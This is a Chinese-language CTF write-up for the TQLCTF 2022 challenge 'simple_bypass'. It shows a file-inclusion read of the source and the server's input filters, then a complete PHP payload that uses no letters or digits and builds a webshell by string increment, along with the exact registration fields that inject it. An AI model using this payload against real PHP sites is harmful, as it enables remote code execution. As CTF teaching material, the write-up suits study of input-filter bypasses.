-
[TQLCTF 2022]simple_bypass
__PUNC__
涉及知识点
- 无数字字母RCE
- 自增马构造
- 文件包含读取源码
解题过程
打开题目,随便注册一个用户为admin
登陆进去后,一眼发现杰哥图片有线索
我们F12看一下如何请求的
在这里发现可能存在文件包含漏洞
我们尝试读取下源码./get_pic.php?image=index.php- 1
然后base64解码一下,直接看核心部分
6){ echo(""); } elseif(strlen($_POST['website']) > 25){ echo(""); } elseif(strlen($_POST['punctuation']) > 1000){ echo(""); } else{ if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){ if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){ $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/","",$_POST['punctuation']); $template = file_get_contents('./template.html'); $content = str_replace("__USER__", $_POST['user'], $template); $content = str_replace("__PASS__", $hash_pass, $content); $content = str_replace("__WEBSITE__", $_POST['website'], $content); $content = str_replace("__PUNC__", $_POST['punctuation'], $content); file_put_contents('sandbox/'.$hash_user.'.php', $content); echo(""); } else{ echo(""); } } else{ echo(""); } } } else{ setcookie("user", $_POST['user'], time()+3600); setcookie("pass", $hash_pass, time()+3600); Header("Location:sandbox/$hash_user.php"); } } ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
在这里可以看到user,website都做了严格的过滤并且限制输入长度
但是观察到strlen($_POST['punctuation']) > 1000,猜测这是利用的突破口
观察到是无字母数字RCE,那么大概思路就是自增构造我们再读取一下源码中的
./template.html
解码完发现很长,这里只展示有用的部分- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
分析一下,
(string)__USER__会将__USER__强转成string类型。
然后利用点已经知道是无数字字母RCE,被禁了,那么只能利用代码前面自带的去shell
我们选择可以利用注释符注释,然后用);闭合回去,__PUNC__写exp再把下面的注释掉。
具体执行如下
__PUNC__的exp$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);- 1
所以我们注册
//注册页面 user:a/* passwd:a website:a punctuation:*/);$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);/* //这个自增代表的是eval(@_POST[_]);- 1
- 2
- 3
- 4
- 5
- 6
- 7
注册成功后,命令执行一下
回显在页面源代码最下面找到(报错无关紧要)
得到flag
SpringMVC全注解开发
国际结算习题(带答案)
聊城办理ISO认证企业须知
【计算机视觉40例】案例18:SVM手写数字识别
校园表白墙源码修复版
Python OpenCV 人脸识别
rollup常用插件详解
华纳云:linux怎么配置jdk环境变量
maven 打包 出现 Please refer to XXXX for the individual test results